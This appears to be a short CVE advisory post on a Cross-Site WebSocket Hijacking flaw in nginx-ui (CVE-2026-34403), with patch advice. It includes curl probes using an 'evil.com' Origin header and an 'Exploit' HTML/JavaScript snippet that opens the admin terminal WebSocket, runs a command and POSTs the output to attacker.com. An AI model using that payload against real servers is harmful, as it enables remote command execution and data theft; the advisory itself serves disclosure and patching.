nginx-ui, Cross-Site WebSocket Hijacking (CSWSH), CVE-2026-34403 (Critical)

Listen to this Post

How the mentioned CVE works

The vulnerability exists because all WebSocket endpoints in nginx-ui use a `gorilla/websocket` Upgrader with `CheckOrigin` unconditionally returning true, which accepts all origins and allows Cross-Site WebSocket Hijacking (CSWSH). This insecure configuration is present in every WebSocket endpoint across the codebase, including api/terminal/pty.go, api/analytic/analytic.go, api/event/websocket.go, and others. The vulnerable code pattern is:

var upgrader = websocket.Upgrader{
CheckOrigin: func(r http.Request) bool {
return true // Accepts ALL origins
},
}

Additionally, authentication tokens (JWT) are stored as cookies without security attributes such as `HttpOnly` or SameSite. The Vue.js frontend stores the token using cookies.set('token', v, { maxAge: 86400 }), and the backend middleware accepts tokens from these cookies. This combination allows a malicious webpage to establish authenticated WebSocket connections when a logged-in administrator visits the attacker-controlled page. The attack requires no privileges and no knowledge of the victim’s credentials, with the only interaction being visiting a webpage.

DailyCVE Form

Platform: nginx-ui
Version: prior 2.3.5
Vulnerability: Cross-Site WebSocket Hijacking
Severity: Critical
date: 2026-04-21

Prediction: Patch available 2026-04-20

What Undercode Say:

Analytics

Check nginx-ui version
docker exec nginx-ui nginx-ui -v
Test for vulnerable WebSocket endpoint
curl -i -N -H "Connection: Upgrade" -H "Upgrade: websocket" -H "Origin: http://evil.com" http://localhost:9000/api/nginx/detail_status/ws
Simple bash script to check CSWSH
for endpoint in /api/nginx/detail_status/ws /api/events /api/analytic/intro /api/nginx_log /api/pty; do
echo "[] Testing $endpoint"
curl -s -o /dev/null -w "%{http_code}" -H "Origin: http://evil.com" http://localhost:9000$endpoint
done

Exploit

<!-- Malicious page hosted on attacker domain -->

<script>
const ws = new WebSocket('ws://TARGET_IP:9000/api/pty');
ws.onopen = () => ws.send('id\n');
ws.onmessage = (e) => fetch('https://attacker.com/steal', {method:'POST', body:e.data});
</script>

Protection from this CVE

  • Update to nginx-ui version 2.3.5 or later, which includes proper origin validation.
  • Implement origin validation in all WebSocket upgraders: CheckOrigin: func(r http.Request) bool { return isAllowedOrigin(r.Header.Get("Origin")) }.
  • Set secure cookie attributes: `sameSite: ‘strict’` and secure: true.
  • Add CSRF token validation to WebSocket upgrade requests as defense-in-depth.

Impact

An attacker can silently steal sensitive server information (nginx configuration, performance metrics, CPU/memory/disk usage, network statistics, system events), read nginx log files (access/error logs containing IP addresses and authentication tokens), gain interactive terminal access (achieving Remote Code Execution if OTP is not enabled), and trigger system operations (nginx reload/restart and binary upgrades).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top